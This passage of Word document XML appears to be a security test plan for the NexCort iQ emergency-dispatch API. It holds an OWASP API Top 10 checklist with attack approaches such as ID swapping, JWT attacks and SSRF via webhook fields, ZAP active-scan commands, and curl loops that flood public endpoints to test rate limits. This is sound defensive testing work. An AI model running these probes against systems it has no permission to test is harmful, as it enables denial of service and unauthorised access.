        <w:t xml:space="preserve">CAP XML parser handles billion laughs attack without crashing (CPU/memory limit enforced)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ULID generation is not predictable from external observation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Race condition on write-back approval produces exactly one approved record</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No JWT attack vector (none, alg confusion, kid injection) bypasses auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No FIPS code manipulation routes a CAP alert to an unintended agency</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 8 — API Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NexCort iQ is an API-first platform. Every capability is exposed through REST APIs consumed by the web app, desktop app, and external integrations. This phase validates all API endpoints against OWASP API Security Top 10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP API Security Top 10 — NexCort iQ Checklist</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80"/>
        <w:gridCol w:w="3240"/>
        <w:gridCol w:w="5760"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1080"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1080"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">API1: BOLA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Broken Object Level Authorization — access another user's resource by changing an ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Request incidents, agencies, billing with swapped agencyId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">API2: Broken Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Weak auth mechanisms, token issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT attacks, Cognito user enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1080"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">API3: BOPLA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Broken Object Property Level Auth — mass assignment via request body</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Include privileged fields (role, agencyId) in PUT request body</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">API4: Unrestricted Resource Consumption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rate limiting absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High-volume requests to CAP ingest, report endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1080"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">API5: BFLA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Broken Function Level Authorization — dispatcher calling admin endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Use dispatcher JWT against supervisor/admin routes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">API6: Unrestricted Access to Sensitive Business Flows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Abuse business logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Auto-approve write-backs, bulk-create QR codes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1080"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">API7: Server Side Request Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Server fetches attacker-controlled URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Inject URLs in webhook config, CAD API URL fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">API8: Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CORS, headers, exposed debug info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Check all CORS headers, X-Powered-By, stack traces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1080"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">API9: Improper Inventory Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Old API versions still accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Test /v0/, /v1/, /internal/, /debug/ paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">API10: Unsafe Consumption of APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Trusting upstream data without validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Inject malicious data via Ring webhook, CAD webhook</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing Tool: OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Run ZAP in daemon mode against staging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">zap.sh -daemon -port 8090 -config api.addrs.addr.name=.* -config api.addrs.addr.enabled=true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Authenticated active scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">zap-cli --zap-url http://localhost:8090 active-scan \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  --scanners all \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  --context-name rc-staging \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  https://api-staging.rapidcortex.us/api</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Rate Limiting Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test rate limit on public CAP ingest endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">for i in {1..200}; do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  curl -s -o /dev/null -w '%{http_code}\n' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    -X POST https://api.rapidcortex.us/api/cad/cap/ingest/test-agency \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    -H 'Content-Type: application/xml' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    -d '&lt;alert&gt;test&lt;/alert&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">done | sort | uniq -c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Expect: 429 responses after the rate limit is hit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test rate limit on QR report endpoint (public, no auth)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">for i in {1..500}; do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  curl -s -o /dev/null -w '%{http_code}\n' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    https://app.rapidcortex.us/report/TESTQRID;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">done | sort | uniq -c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
